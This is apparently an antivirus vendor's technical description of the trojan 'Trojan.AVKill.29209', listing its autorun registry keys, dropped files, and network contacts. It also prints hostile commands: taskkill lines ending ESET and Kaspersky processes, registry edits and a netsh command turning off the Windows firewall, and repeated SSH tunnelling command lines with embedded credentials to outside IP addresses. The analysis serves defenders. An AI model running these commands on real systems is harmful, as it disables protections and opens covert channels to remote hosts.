Trojan.AVKill.29209

Technical Information

To ensure autorun and distribution:

Modifies the following registry keys:

[<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'INTERNET' = '%TEMP%\svchost.exe setup.exe'
[<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'windows startup' = '%TEMP%\svchost.exe setup.exe'

Malicious functions:

To bypass firewall, removes or modifies the following registry keys:

[<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile] 'DoNotAllowExceptions' = '00000000'
[<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile] 'EnableFirewall' = '00000000'

Creates and executes the following:

%TEMP%\psiphon3-plonk.exe -ssh -C -N -batch -P 993 -l psiphon_ssh_6e3ddaa1f5219072 -pw E13A60A483CFD610101D1F7F1A4961A0c845ef34fc9bfb3bd1027ebfa54aa529ef4809920f3f846f08a244c5ce3fec48 -D 1080 -z -Z c49d7931eb6d00c39e4adcffbee00e488698d63eccb96f61bc25a2b2b6f317bd 192.155.93.208
%TEMP%\psiphon3-plonk.exe -ssh -C -N -batch -P 730 -l psiphon_ssh_78e6c27827700543 -pw 55F2439A7F777F0097043C62072FB1597adb3966c861a8f5181483cc8169d438fbadc0bc9bdffcc9d8347d465e54fd70 -D 1080 -z -Z 8a2210939910201f3e18e29eb5af6bdb494d60e794f5621478720b9cb909ad99 192.155.93.224
%TEMP%\psiphon3-plonk.exe -ssh -C -N -batch -P 730 -l psiphon_ssh_78e6c27827700543 -pw B2AC1A24D7DB152D7C534D30071460A87adb3966c861a8f5181483cc8169d438fbadc0bc9bdffcc9d8347d465e54fd70 -D 1080 -z -Z 8a2210939910201f3e18e29eb5af6bdb494d60e794f5621478720b9cb909ad99 192.155.93.224
%TEMP%\psiphon3-plonk.exe -ssh -C -N -batch -P 730 -l psiphon_ssh_78e6c27827700543 -pw 210865A901C3A80E938F0432F329B0D47adb3966c861a8f5181483cc8169d438fbadc0bc9bdffcc9d8347d465e54fd70 -D 1080 -z -Z 8a2210939910201f3e18e29eb5af6bdb494d60e794f5621478720b9cb909ad99 192.155.93.224
%TEMP%\psiphon3-plonk.exe -ssh -C -N -batch -P 993 -l psiphon_ssh_6e3ddaa1f5219072 -pw 84E09FC8690348067ED652761D81DF76c845ef34fc9bfb3bd1027ebfa54aa529ef4809920f3f846f08a244c5ce3fec48 -D 1080 -z -Z c49d7931eb6d00c39e4adcffbee00e488698d63eccb96f61bc25a2b2b6f317bd 192.155.93.208
%TEMP%\psiphon3-plonk.exe -ssh -C -N -batch -P 730 -l psiphon_ssh_78e6c27827700543 -pw 656FAD4615AF9013BB210822297D86907adb3966c861a8f5181483cc8169d438fbadc0bc9bdffcc9d8347d465e54fd70 -D 1080 -z -Z 8a2210939910201f3e18e29eb5af6bdb494d60e794f5621478720b9cb909ad99 192.155.93.224
%TEMP%\psiphon3-plonk.exe -ssh -C -N -batch -P 993 -l psiphon_ssh_6e3ddaa1f5219072 -pw 436AB793850F88C84C1E1942A6DBA51Dc845ef34fc9bfb3bd1027ebfa54aa529ef4809920f3f846f08a244c5ce3fec48 -D 1080 -z -Z c49d7931eb6d00c39e4adcffbee00e488698d63eccb96f61bc25a2b2b6f317bd 192.155.93.208
%TEMP%\psiphon3-plonk.exe -ssh -C -N -batch -P 993 -l psiphon_ssh_6e3ddaa1f5219072 -pw 73113AC6FA5EA46C3BB7C92F7875D611c845ef34fc9bfb3bd1027ebfa54aa529ef4809920f3f846f08a244c5ce3fec48 -D 1080 -z -Z c49d7931eb6d00c39e4adcffbee00e488698d63eccb96f61bc25a2b2b6f317bd 192.155.93.208
%TEMP%\psiphon3-plonk.exe -ssh -C -N -batch -P 993 -l psiphon_ssh_6e3ddaa1f5219072 -pw E0A3EB67FA038E2711A706226DBE8BB7c845ef34fc9bfb3bd1027ebfa54aa529ef4809920f3f846f08a244c5ce3fec48 -D 1080 -z -Z c49d7931eb6d00c39e4adcffbee00e488698d63eccb96f61bc25a2b2b6f317bd 192.155.93.208
%TEMP%\psiphon3-plonk.exe -ssh -C -N -batch -P 730 -l psiphon_ssh_78e6c27827700543 -pw E88076CF9306FB529D15CF1A6B609AB37adb3966c861a8f5181483cc8169d438fbadc0bc9bdffcc9d8347d465e54fd70 -D 1080 -z -Z 8a2210939910201f3e18e29eb5af6bdb494d60e794f5621478720b9cb909ad99 192.155.93.224
%TEMP%\psiphon3-plonk.exe -ssh -C -N -batch -P 993 -l psiphon_ssh_6e3ddaa1f5219072 -pw 5F07EA308A9ECF8662D77CAF84F13ED3c845ef34fc9bfb3bd1027ebfa54aa529ef4809920f3f846f08a244c5ce3fec48 -D 1080 -z -Z c49d7931eb6d00c39e4adcffbee00e488698d63eccb96f61bc25a2b2b6f317bd 192.155.93.208
%TEMP%\psiphon3-plonk.exe -ssh -C -N -batch -P 730 -l psiphon_ssh_78e6c27827700543 -pw 107F678373CE2FE0B51C08D8BB4BAA767adb3966c861a8f5181483cc8169d438fbadc0bc9bdffcc9d8347d465e54fd70 -D 1080 -z -Z 8a2210939910201f3e18e29eb5af6bdb494d60e794f5621478720b9cb909ad99 192.155.93.224
%TEMP%\psiphon3-plonk.exe -ssh -C -N -batch -P 993 -l psiphon_ssh_6e3ddaa1f5219072 -pw 3906C11BDCB15BFF78C2AF8757EF6419c845ef34fc9bfb3bd1027ebfa54aa529ef4809920f3f846f08a244c5ce3fec48 -D 1080 -z -Z c49d7931eb6d00c39e4adcffbee00e488698d63eccb96f61bc25a2b2b6f317bd 192.155.93.208
%TEMP%\svchost.exe setup.exe
%TEMP%\psiphon3.exe
%TEMP%\svchost.exe setup.exe
%TEMP%\psiphon3-plonk.exe -ssh -C -N -batch -P 993 -l psiphon_ssh_6e3ddaa1f5219072 -pw 34E3E835663F7CF4A8BC2DB67DD8A045c845ef34fc9bfb3bd1027ebfa54aa529ef4809920f3f846f08a244c5ce3fec48 -D 1080 -z -Z c49d7931eb6d00c39e4adcffbee00e488698d63eccb96f61bc25a2b2b6f317bd 192.155.93.208
%TEMP%\psiphon3-plonk.exe -ssh -C -N -batch -P 730 -l psiphon_ssh_78e6c27827700543 -pw 60081A0AA2EEA0F6A8E8550F6BE3FF3C7adb3966c861a8f5181483cc8169d438fbadc0bc9bdffcc9d8347d465e54fd70 -D 1080 -z -Z 8a2210939910201f3e18e29eb5af6bdb494d60e794f5621478720b9cb909ad99 192.155.93.224
%TEMP%\psiphon3-plonk.exe -ssh -C -N -batch -P 730 -l psiphon_ssh_78e6c27827700543 -pw 208C1AB62E4D18B60558B1EE9382789D7adb3966c861a8f5181483cc8169d438fbadc0bc9bdffcc9d8347d465e54fd70 -D 1080 -z -Z 8a2210939910201f3e18e29eb5af6bdb494d60e794f5621478720b9cb909ad99 192.155.93.224
%TEMP%\psiphon3-plonk.exe -ssh -C -N -batch -P 730 -l psiphon_ssh_78e6c27827700543 -pw 72ED0E12A197659EA330B6A8D42E2A4C7adb3966c861a8f5181483cc8169d438fbadc0bc9bdffcc9d8347d465e54fd70 -D 1080 -z -Z 8a2210939910201f3e18e29eb5af6bdb494d60e794f5621478720b9cb909ad99 192.155.93.224
%TEMP%\psiphon3-plonk.exe -ssh -C -N -batch -P 993 -l psiphon_ssh_6e3ddaa1f5219072 -pw 5879557704BEDE3443BC006F41A4FFE0c845ef34fc9bfb3bd1027ebfa54aa529ef4809920f3f846f08a244c5ce3fec48 -D 1080 -z -Z c49d7931eb6d00c39e4adcffbee00e488698d63eccb96f61bc25a2b2b6f317bd 192.155.93.208

Executes the following:

<SYSTEM32>\taskkill.exe /f /im egui.EXE
<SYSTEM32>\taskkill.exe /f /im ekrn.EXE
<SYSTEM32>\taskkill.exe /f /mi aVP.exe
<SYSTEM32>\netsh.exe firewall set opmode disable
<SYSTEM32>\taskkill.exe /f /mi NOD32krn.exe
<SYSTEM32>\taskkill.exe /f /mi NOD32KUI.EXE

Terminates or attempts to terminate

the following user processes:

ekrn.exe

Modifies file system :

Creates the following files:

%TEMP%\psiphon3-plonk.exe
<LS_APPDATA>\PUTTY.RND
%TEMP%\svchost.exe setup.exe
%TEMP%\psiphon3.exe
%TEMP%\svchost.exe setup.exe

Sets the 'hidden' attribute to the following files:

%TEMP%\svchost.exe setup.exe
%TEMP%\svchost.exe setup.exe

Network activity:

Connects to:

'sm##.gmail.com':465
'localhost':1207
's3.###zonaws.com':443
'19#.#55.93.208':993
'localhost':1080
'19#.#55.93.224':730

UDP:

DNS ASK s3.###zonaws.com
DNS ASK sm##.gmail.com

Miscellaneous:

Searches for the following windows:

ClassName: '' WindowName: ''
ClassName: 'Indicator' WindowName: ''
ClassName: 'Edit' WindowName: ''
ClassName: 'Notepad' WindowName: ''
ClassName: '' WindowName: 'Windows Task Manager'
ClassName: 'Shell_TrayWnd' WindowName: ''
ClassName: 'SysListView32' WindowName: ''
ClassName: '#32770' WindowName: ''

Technologies

Terminology

Training and education

Myths

Technical Information

Curing recommendations

Free trial